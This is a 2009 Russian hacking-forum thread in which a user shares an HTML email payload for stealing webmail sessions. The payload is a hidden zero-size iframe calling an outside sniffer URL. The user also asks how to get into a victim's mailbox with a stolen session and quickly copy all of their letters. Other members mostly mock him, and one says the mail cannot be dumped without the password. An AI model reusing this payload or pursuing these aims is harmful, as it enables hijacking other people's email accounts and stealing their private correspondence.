HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Скрипты для кражи сессии =)
  #1  
Старый 25.05.2009, 18:10
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile Скрипты для кражи сессии =)

Отписываем скрыпты для кражи сессии, сам напишу старый скрипт, посылаеться как HTML:
Код HTML:
<font color=red> Текст </font>  <iframe scr=http://antichat.ru/cgi-bin/s.jpg frameborder=0 width=0 height=0></iframe>
Есть ли еще что то, и на каких почтовых ящиках проходит?!
И еще если я украду ссесию, я могу зайти на почту жертвы, только когда она уже онлайн, или в другое время тоже(знаю, что сессия долго не живет)?!

Последний раз редактировалось LemoTTT; 25.05.2009 в 18:12..
 
Ответить с цитированием

  #2  
Старый 25.05.2009, 18:15
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Это называется XSS, о мой юный падаван
 
Ответить с цитированием

  #3  
Старый 25.05.2009, 18:16
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile

Ответьте на 1 вопрос:
Если я украл сессию, я могу зайти в почтовый ящик жертвы, когда она не онлайн?
(проверял на своем ящике, когда жертва не онлайн по сессии не заходит)
и если НЕТ(не могу)- то как можно зайти в ящик жертвы имея сессию, я же не буду каждые 5 мин тыкать онлайн ли она или нет!

Последний раз редактировалось LemoTTT; 25.05.2009 в 19:43..
 
Ответить с цитированием

  #4  
Старый 25.05.2009, 21:38
-Unlocked-
Участник форума
Регистрация: 06.12.2008
Сообщений: 194
С нами: 9173217

Репутация: 815
По умолчанию

http://forum.antichat.ru/thread88986.html
 
Ответить с цитированием

  #5  
Старый 25.05.2009, 21:41
Player#1
Познающий
Регистрация: 11.11.2008
Сообщений: 77
С нами: 9208644

Репутация: 99
По умолчанию

ОМГ это уже 10 тема автора на эту тему...
 
Ответить с цитированием

  #6  
Старый 25.05.2009, 21:44
lmns
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
С нами: 10114465

Репутация: 303


По умолчанию

Цитата:
Сообщение от Player#1  
ОМГ это уже 10 тема автора на эту тему...
И толку ноль.
 
Ответить с цитированием

  #7  
Старый 26.05.2009, 10:09
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile

1) Так как можно зайти в ящик жертвы с помошью сессии, если жертва не онлайн!
2) Вдруг я угадаю время и зайду в ящик жертвы, как мне быстро сохранить все письма к себе(на раб стол или куда то)?Ну тойсть слить всю инфу за пару минут!
 
Ответить с цитированием

  #8  
Старый 26.05.2009, 10:15
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от LemoTTT  
1) Так как можно зайти в ящик жертвы с помошью сессии, если жертва не онлайн!
2) Вдруг я угадаю время и зайду в ящик жертвы, как мне быстро сохранить все письма к себе(на раб стол или куда то)?Ну тойсть слить всю инфу за пару минут!
почему ты еще не в бане ><
 
Ответить с цитированием

  #9  
Старый 26.05.2009, 10:28
-Unlocked-
Участник форума
Регистрация: 06.12.2008
Сообщений: 194
С нами: 9173217

Репутация: 815
По умолчанию

Э,братцы..Не раскисайте,знаете ведь,что каникулы начались...
LemoTTT,
1. тут лучше промолчать...
2. никак..имея доступ к сессии и не имея пароля(а его то ты точно не поимеешь,спи3дев сессию),ты не сможешь зайти через почтовый клиент и слить письма на хард..
Вообщем,читай,практикуйся.. .
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Шпаргалки для сертификатов по Битрикс Liar PHP 7 30.05.2009 10:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.